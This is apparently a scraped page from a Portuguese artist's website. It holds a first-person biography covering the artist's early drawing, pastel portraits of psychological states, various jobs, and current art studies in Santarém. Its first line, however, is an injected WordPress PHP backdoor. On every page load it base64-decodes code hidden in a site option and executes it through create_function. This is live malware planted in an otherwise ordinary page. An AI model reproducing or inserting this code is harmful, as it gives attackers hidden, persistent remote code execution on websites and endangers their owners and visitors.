add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ), 0 );
Desenho e pinto desde pequeno, como qualquer criança no jardim de infância, escola primária e por aí adiante.
Com o passar dos anos esta paixão foi ganhando forma e aos 14 /15 anos comecei a desenvolver as primeiras pinturas a óleo, coisa que durou pouco tempo, já que óleo nunca foi a minha perdição. Foi também nessa época que vendi o meu primeiro quadro. (Um primo afastado influenciado pelo meu pai lá se deixou ir pela sua conversa, e assim agir nesta maneira simpática de me incentivar). Após isto, comecei a desenvolver técnicas secas como, o grafite, carvão e principalmente o pastel seco. Foi com este último que o meu trabalho alcançou maior notoriedade,um trabalho em que criei uma linha de retratos de diferentes gerações, todos eles com o objectivo de interpretar o estado psicológico das pessoas através do retrato.
Paralelamente à pintura nestes últimos anos, exerci diversas profissões (operador de fábrica , supermercados, entre outros…) Num momento em que estou prestes a assinar um contrato efectivo, decidi colocar um ponto final e deixar para trás o que eu não gostava de exercer, preferindo assim correr o risco de tentar ingressar num curso superior relacionado com artes. Actualmente sou aluno na Escola Superior de Educação de Santarém, onde frequento o curso de Artes Plásticas e Multimédia.
A minha linha de trabalhos também se alterou, de momento trabalho com diversas técnicas e tipos de materiais, sendo a maioria em tinta acrílica, aguarela, guache e tinta da china. Ao invés do que acontecia com os retratos, neste momento a intenção do meu trabalho está virada não só para o estado psicológico do ser humano , mas principalmente para relação entre as pessoas e o mundo dos meios de comunicação e publicitário, questionando assim a condição do ser humano.”